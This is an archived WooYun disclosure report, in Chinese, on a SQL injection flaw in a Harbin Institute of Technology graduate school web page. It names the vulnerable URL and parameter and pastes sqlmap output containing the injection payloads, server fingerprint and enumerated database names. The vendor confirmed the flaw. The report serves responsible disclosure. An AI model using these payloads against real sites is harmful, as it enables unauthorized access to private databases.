乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-28: 细节已通知厂商并且等待厂商处理中 2015-09-01: 厂商已经确认,细节仅向厂商公开 2015-09-11: 细节向核心白帽子及相关领域专家公开 2015-09-21: 细节向普通白帽子公开 2015-10-01: 细节向实习白帽子公开 2015-10-16: 细节向公众公开
哈尔滨工业大学某研究生院网站存在sql注入漏洞,暴露信息
漏洞页面:http://nic.hitsz.edu.cn/mingx.php?id=30
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 39 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=30 AND 1458=1458 Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: id=-3019 UNION ALL SELECT NULL,NULL,CONCAT(0x716c696f71,0x48476658776c5a4d515a,0x716a706971)#---[15:27:28] [INFO] testing MySQL[15:27:29] [INFO] confirming MySQL[15:27:30] [INFO] the back-end DBMS is MySQLweb application technology: PHP 4.3.11, Apache 2.0.59back-end DBMS: MySQL < 5.0.0[15:27:30] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/nic.hitsz.edu.cn'
[15:28:07] [INFO] fetching number of databases[15:28:07] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[15:28:07] [INFO] retrieved: 4[15:28:10] [INFO] retrieved: test[15:28:32] [INFO] retrieved: test\_%[15:29:11] [INFO] retrieved: linpha[15:29:50] [INFO] retrieved: wanghuaavailable databases [4]:[*] `test\\_%`[*] linpha[*] test[*] wanghua[15:30:32] [INFO] fetched data logged t
15:30:54] [INFO] confirming MySQL[15:30:55] [INFO] the back-end DBMS is MySQLweb application technology: PHP 4.3.11, Apache 2.0.59back-end DBMS: MySQL < 5.0.0[15:30:55] [INFO] fetching current database[15:30:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[15:30:55] [INFO] retrieved: hitniccurrent database: 'hitnic'[15:31:28] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/nic.hitsz.edu.cn'
如上,只跑出数据库作证明
过滤
危害等级:低
漏洞Rank:3
确认时间:2015-09-01 21:06
感谢
暂无